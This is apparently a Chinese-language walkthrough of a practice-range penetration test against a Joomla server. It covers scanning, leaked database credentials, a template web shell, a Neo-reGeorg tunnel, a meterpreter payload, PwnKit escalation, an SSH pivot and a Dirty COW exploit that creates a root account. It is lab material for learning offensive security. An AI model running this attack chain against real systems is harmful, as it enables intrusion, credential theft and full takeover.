一、主机扫描(靶场开放端口与服务、主机操作系统与版本)
(一) nmap -sT 192.168.101.1/24
Nmap scan report for 192.168.101.150
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
(二) nmap -A 192.168.101.150
开放端口与软件版本
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http nginx 1.9.4
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
操作系统版本
MAC Address: 00:0C:29:32:46:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
二、web扫描(域名与url路径、常规漏洞)
(一) dirb http://192.168.101.150
---- Scanning URL: http://192.168.101.150/ ----
==> DIRECTORY: http://192.168.101.150/administrator/
==> DIRECTORY: http://192.168.101.150/bin/
==> DIRECTORY: http://192.168.101.150/cache/
==> DIRECTORY: http://192.168.101.150/components/
==> DIRECTORY: http://192.168.101.150/images/
==> DIRECTORY: http://192.168.101.150/includes/
http://192.168.101.150/index.php (CODE:200|SIZE:16031)
==> DIRECTORY: http://192.168.101.150/language/
==> DIRECTORY: http://192.168.101.150/layouts/
==> DIRECTORY: http://192.168.101.150/libraries/
==> DIRECTORY: http://192.168.101.150/media/
==> DIRECTORY: http://192.168.101.150/modules/
==> DIRECTORY: http://192.168.101.150/plugins/
http://192.168.101.150/robots.txt (CODE:200|SIZE:829)
http://192.168.101.150/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.101.150/templates/
==> DIRECTORY: http://192.168.101.150/tmp/
---- Entering directory: http://192.168.101.150/administrator/ ----
==> DIRECTORY: http://192.168.101.150/administrator/cache/
==> DIRECTORY: http://192.168.101.150/administrator/components/
==> DIRECTORY: http://192.168.101.150/administrator/help/
==> DIRECTORY: http://192.168.101.150/administrator/includes/
http://192.168.101.150/administrator/index.php (CODE:200|SIZE:5005)
==> DIRECTORY: http://192.168.101.150/administrator/language/
==> DIRECTORY: http://192.168.101.150/administrator/logs/
==> DIRECTORY: http://192.168.101.150/administrator/modules/
==> DIRECTORY: http://192.168.101.150/administrator/templates/
---- Entering directory: http://192.168.101.150/bin/ ----
+ http://192.168.101.150/bin/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/cache/ ----
+ http://192.168.101.150/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/components/ ----
+ http://192.168.101.150/components/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/images/ ----
==> DIRECTORY: http://192.168.101.150/images/banners/
==> DIRECTORY: http://192.168.101.150/images/headers/
http://192.168.101.150/images/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/includes/ ----
+ http://192.168.101.150/includes/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/language/ ----
+ http://192.168.101.150/language/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/layouts/ ----
+ http://192.168.101.150/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/layouts/joomla/
==> DIRECTORY: http://192.168.101.150/layouts/libraries/
==> DIRECTORY: http://192.168.101.150/layouts/plugins/
---- Entering directory: http://192.168.101.150/libraries/ ----
==> DIRECTORY: http://192.168.101.150/libraries/cms/
http://192.168.101.150/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/libraries/joomla/
==> DIRECTORY: http://192.168.101.150/libraries/legacy/
==> DIRECTORY: http://192.168.101.150/libraries/src/
==> DIRECTORY: http://192.168.101.150/libraries/vendor/
---- Entering directory: http://192.168.101.150/media/ ----
==> DIRECTORY: http://192.168.101.150/media/cms/
==> DIRECTORY: http://192.168.101.150/media/contacts/
==> DIRECTORY: http://192.168.101.150/media/editors/
http://192.168.101.150/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/media/mailto/
==> DIRECTORY: http://192.168.101.150/media/media/
==> DIRECTORY: http://192.168.101.150/media/system/
---- Entering directory: http://192.168.101.150/modules/ ----
+ http://192.168.101.150/modules/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/plugins/ ----
==> DIRECTORY: http://192.168.101.150/plugins/authentication/
==> DIRECTORY: http://192.168.101.150/plugins/captcha/
==> DIRECTORY: http://192.168.101.150/plugins/content/
==> DIRECTORY: http://192.168.101.150/plugins/editors/
==> DIRECTORY: http://192.168.101.150/plugins/extension/
==> DIRECTORY: http://192.168.101.150/plugins/fields/
http://192.168.101.150/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/plugins/installer/
==> DIRECTORY: http://192.168.101.150/plugins/privacy/
==> DIRECTORY: http://192.168.101.150/plugins/search/
==> DIRECTORY: http://192.168.101.150/plugins/system/
==> DIRECTORY: http://192.168.101.150/plugins/user/
---- Entering directory: http://192.168.101.150/templates/ ----
+ http://192.168.101.150/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/templates/system/
---- Entering directory: http://192.168.101.150/tmp/ ----
+ http://192.168.101.150/tmp/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/administrator/cache/ ----
+ http://192.168.101.150/administrator/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/administrator/logs/ ----
+ http://192.168.101.150/administrator/logs/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.101.150/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/libraries/src/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/libraries/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/privacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/templates/system/ ----
==> DIRECTORY: http://192.168.101.150/templates/system/css/
==> DIRECTORY: http://192.168.101.150/templates/system/html/
==> DIRECTORY: http://192.168.101.150/templates/system/images/
http://192.168.101.150/templates/system/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.101.150/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.101.150/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
(二) dirseach -u http://192.168.101.150
[11:12:02] 403 - 280B - /.configuration.php.swp
[11:12:05] 403 - 280B - /.htaccess.bak1
[11:12:05] 403 - 280B - /.ht_wsr.txt
[11:12:06] 403 - 280B - /.htaccess.sample
[11:12:06] 403 - 280B - /.htaccess.orig
[11:12:06] 403 - 280B - /.htaccess.save
[11:12:06] 403 - 280B - /.htaccess_extra
[11:12:06] 403 - 280B - /.htaccess_sc
[11:12:06] 403 - 280B - /.htaccessOLD2
[11:12:06] 403 - 280B - /.htm
[11:12:06] 403 - 280B - /.htaccessOLD
[11:12:06] 403 - 280B - /.htaccess_orig
[11:12:06] 403 - 280B - /.html
[11:12:06] 403 - 280B - /.htaccessBAK
[11:12:06] 403 - 280B - /.htpasswds
[11:12:06] 403 - 280B - /.httr-oauth
[11:12:06] 403 - 280B - /.htpasswd_test
[11:12:08] 403 - 280B - /.php
[11:12:13] 200 - 24KB - /1.php
[11:12:13] 200 - 0B - /2.php
[11:12:38] 301 - 326B - /administrator -> http://192.168.101.150/administrator/
[11:12:39] 200 - 527B - /administrator/includes/
[11:12:39] 200 - 31B - /administrator/cache/
[11:12:39] 301 - 331B - /administrator/logs -> http://192.168.101.150/administrator/logs/
[11:12:39] 200 - 31B - /administrator/logs/
[11:12:39] 200 - 2KB - /administrator/
[11:12:39] 200 - 2KB - /administrator/index.php
[11:12:47] 200 - 31B - /bin/
[11:12:47] 301 - 316B - /bin -> http://192.168.101.150/bin/
[11:12:49] 200 - 31B - /cache/
[11:12:49] 301 - 318B - /cache -> http://192.168.101.150/cache/
[11:12:51] 200 - 31B - /cli/
[11:12:53] 301 - 323B - /components -> http://192.168.101.150/components/
[11:12:53] 200 - 31B - /components/
[11:12:55] 200 - 2KB - /configuration.php~
[11:12:55] 200 - 0B - /configuration.php
[11:13:21] 200 - 1KB - /htaccess.txt
[11:13:23] 200 - 31B - /images/
[11:13:23] 301 - 319B - /images -> http://192.168.101.150/images/
[11:13:24] 200 - 31B - /includes/
[11:13:24] 301 - 321B - /includes -> http://192.168.101.150/includes/
[11:13:26] 200 - 3KB - /index.php/login/
[11:13:27] 200 - 4KB - /index.php
[11:13:31] 301 - 321B - /language -> http://192.168.101.150/language/
[11:13:31] 200 - 31B - /layouts/
[11:13:32] 301 - 322B - /libraries -> http://192.168.101.150/libraries/
[11:13:32] 200 - 31B - /libraries/
[11:13:32] 200 - 7KB - /LICENSE.txt
[11:13:40] 200 - 31B - /media/
[11:13:40] 301 - 318B - /media -> http://192.168.101.150/media/
[11:13:44] 301 - 320B - /modules -> http://192.168.101.150/modules/
[11:13:44] 200 - 31B - /modules/
[11:13:58] 301 - 320B - /plugins -> http://192.168.101.150/plugins/
[11:13:59] 200 - 31B - /plugins/
[11:14:04] 200 - 2KB - /README.txt
[11:14:06] 200 - 392B - /robots.txt
[11:14:10] 403 - 280B - /server-status
[11:14:10] 403 - 280B - /server-status/
[11:14:24] 200 - 31B - /templates/
[11:14:24] 301 - 322B - /templates -> http://192.168.101.150/templates/
[11:14:24] 200 - 0B - /templates/beez3/
[11:14:24] 200 - 0B - /templates/protostar/
[11:14:24] 200 - 31B - /templates/index.html
[11:14:24] 200 - 0B - /templates/system/
[11:14:26] 301 - 316B - /tmp -> http://192.168.101.150/tmp/
[11:14:26] 200 - 31B - /tmp/
[11:14:41] 200 - 628B - /web.config.txt
(三) appscan
(四) acunetix
三、筛选可用目录信息
http://192.168.101.150/configuration.php~
http://192.168.101.150/index.php/login/
http://192.168.101.150/administrator/index.php
http://192.168.101.150/templates/system/html/
四、尝试getshell
(一) 通过configuration.php~,发现数据库的账号密码。
public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';
(二) 使用Navicat登录数据库,得到系统登录账号,密码无法破解。
使用pyCharm编写一个密码进行替换。
import bcrypt
# 要加密的明文密码
password = '123'
# 将明文密码转换为字节串
password_bytes = password.encode('utf-8')
# 使用bcrypt库的hashpw方法对密码进行哈希加密
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
# 将哈希密码转换为字符串
hashed_password = hashed.decode('utf-8')
print("加密后的密码:", hashed_password)
(三) 成功登录系统,发现Templates模块可以上传代码/文件。
使用蚁剑登录后发现无法输入命令,使用插件绕过disable_functions。getshell。
五、尝试提权root
(一) 在kali中使用Neo生成木马
python3 neoreg.py generate -k 123456
(二) 将生成的木马文件tunnel.php上传至web服务器后,在kali运行命令:建立正向隧道
python3 neoreg.py -k 123456 -u http://192.168.101.150/templates/beez3/tunnel.php
(三) 在kali中使用msfvenom生成监听文件,将文件上传web并运行等待
msfvenom -p linux/x64/meterpreter/bind_tcp rhost=192.168.93.120 lport=7777 -f elf -o /tmp/muma.elf
(四) 使用msfconsole,配置隧道代理,进行监听。
setg proxies socks5:127.0.0.1:1080
handler -p linux/x64/meterpreter/bind_tcp -H 192.168.93.120 -P 7777
(五) 进入session,使用辅助提权模块批量获取漏洞
run post/multi/recon/local_exploit_suggester
(六) 使用可利用漏洞,获取root权限
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
六、收集web主机信息与其内网主机信息
uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.93.0 * 255.255.255.0 U 0 0 0 ens33
arp -a
IP address MAC address Interface
---------- ----------- ---------
192.168.93.100 00:0c:29:32:46:d3 ens33
cat /root/mysql/test.txt
adduser wwwuser
passwd wwwuser_123Aqx
七、提权root后,发现内网账号密码信息,尝试登录
(一) 在kali中配置代理信息
vim /etc/proxychains4.conf
socks5:127.0.0.1:1080
(二) 添加ssh的config文件 vim /root/.ssh/config
Host *
KexAlgorithms +diffie-hellman-group1-sha1
HostkeyAlgorithms +ssh-dss,ssh-rsa
PubkeyAcceptedKeyTypes +ssh-dss,ssh-rsa
Ciphers +aes128-cbc
(三) 使用ssh连接
proxychains ssh wwwuser@192.168.93.100
wwwuser_123Aqx
(四) 连接成功后收集信息,发现系统版本为2.6.32-431.el6.x86_64
(五) 该改本满足脏牛漏洞的影响范围,下载脏牛漏洞进行提权
GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
wget https://github.com/FireFart/dirtycow #下载脏牛
gcc -pthread dirty.c -o dirty -lcrypt #编译
./dirty #执行
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: #输入密码
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash #漏洞执行成功,自动创建root权限的账号